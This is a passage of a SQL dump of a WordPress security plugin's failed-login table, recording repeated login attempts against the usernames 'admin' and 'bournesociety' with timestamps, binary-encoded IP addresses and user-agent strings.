Firefox/62.0'),(5175,8527,1629517673.957916,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5176,8529,1629518763.427382,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5177,8532,1629520735.099038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��jK��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5178,8534,1629522023.949234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5179,8535,1629522073.938583,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(5180,8537,1629523732.009163,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�&','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5181,8538,1629524681.705877,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5182,8540,1629526042.882886,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5183,8541,1629527056.019063,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(5184,8542,1629528054.246839,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5185,8544,1629528721.786740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����T�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(5186,8545,1629528773.926601,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)'),(5187,8547,1629529325.996207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5188,8548,1629529838.966652,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0'),(5189,8549,1629529912.161898,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5190,8550,1629530404.384238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5191,8551,1629530534.966819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5192,8551,1629530534.986981,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5193,8552,1629531165.755155,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��o]5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5194,8553,1629531312.529580,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),(5195,8557,1629532991.527106,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����6','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5196,8558,1629533613.029623,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5197,8559,1629533676.432632,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Rʬ�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(5198,8560,1629534152.303887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5199,8561,1629534737.380342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5200,8562,1629535295.294354,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5201,8563,1629535346.094063,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5202,8576,1629536568.178351,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5203,8577,1629536923.821300,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5204,8578,1629537187.020652,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5205,8579,1629537883.080639,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5206,8580,1629538531.594542,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�\Z','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(5207,8581,1629538535.949775,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5208,8583,1629539863.897594,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5209,8584,1629539953.549119,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}:w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5210,8585,1629540112.265663,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����M','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5211,8588,1629541295.302897,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),(5212,8589,1629541405.777893,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=/(3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5213,8590,1629541954.028975,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(5214,8595,1629544475.733611,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5215,8596,1629545016.841320,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D��U','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5216,8597,1629545264.855240,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2tb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5217,8598,1629546084.619410,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5218,8601,1629547743.986032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=C�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5219,8602,1629548590.326015,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5220,8603,1629549474.773054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5221,8605,1629549964.776637,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5222,8605,1629549964.804673,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5223,8606,1629550384.688714,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5224,8607,1629551237.693030,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(5225,8608,1629551264.043566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5226,8609,1629551553.380604,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(5227,8610,1629552234.135811,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=�F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5228,8615,1629555380.903164,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5229,8619,1629556026.988768,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5230,8620,1629556855.521858,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����p�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5231,8621,1629557006.325405,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@om�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5232,8625,1629559235.513732,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(5233,8626,1629560016.695153,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5234,8626,1629560016.757065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5235,8627,1629560138.631784,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5236,8629,1629561621.631275,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D�q?','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5237,8631,1629563999.324101,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�,','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5238,8632,1629565177.290769,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���/�\"','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(5239,8635,1629569956.647447,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����p�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5240,8638,1629572255.871769,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),(5241,8639,1629572263.834143,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5242,8640,1629572521.901219,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5243,8641,1629572552.405744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(5244,8642,1629572764.157068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h+�5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5245,8643,1629573016.485683,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5246,8644,1629573489.783414,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/[+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5247,8645,1629573730.296899,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5248,8646,1629573843.916981,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(5249,8647,1629574235.770964,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5250,8648,1629574544.510216,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5251,8649,1629574775.982015,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=o�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5252,8650,1629575068.531168,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(5253,8650,1629575068.619082,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(5254,8651,1629575086.487342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5255,8652,1629575378.946826,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̆�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5256,8652,1629575378.963393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̆�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5257,8653,1629575437.337096,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5258,8654,1629575445.386707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5259,8655,1629575449.826839,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5260,8656,1629575452.706544,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5261,8657,1629575457.236542,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5262,8658,1629575459.908409,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5263,8659,1629575462.756544,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5264,8660,1629575465.896535,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5265,8661,1629575469.750604,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5266,8662,1629575471.107804,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5267,8663,1629575472.598046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5268,8663,1629575472.691371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5269,8664,1629575474.761631,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5270,8665,1629575476.495780,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5271,8666,1629575478.261820,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5272,8667,1629575480.389525,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5273,8668,1629575483.145789,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5274,8669,1629575484.328948,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5275,8670,1629575486.224543,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5276,8672,1629575631.331561,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5277,8673,1629575928.245944,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\r�>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5278,8674,1629576209.747742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5279,8675,1629576283.545063,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5280,8676,1629576497.759449,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5281,8677,1629576786.168369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˖kM','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5282,8677,1629576786.202592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˖kM','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5283,8678,1629577081.032988,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B�r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5284,8680,1629577375.226097,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5285,8681,1629577476.573303,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���!','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(5286,8682,1629577673.096609,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5287,8683,1629577968.763365,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5288,8684,1629578283.685545,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n-p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5289,8685,1629578572.323010,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5290,8686,1629578657.603792,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ٮ�i','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(5291,8687,1629578889.575183,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5292,8688,1629579229.254114,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Օg�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5293,8690,1629579536.332164,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5294,8691,1629579773.377385,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�4�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),(5295,8691,1629579773.421503,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�4�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),(5296,8694,1629580170.477754,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5297,8695,1629580484.324243,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 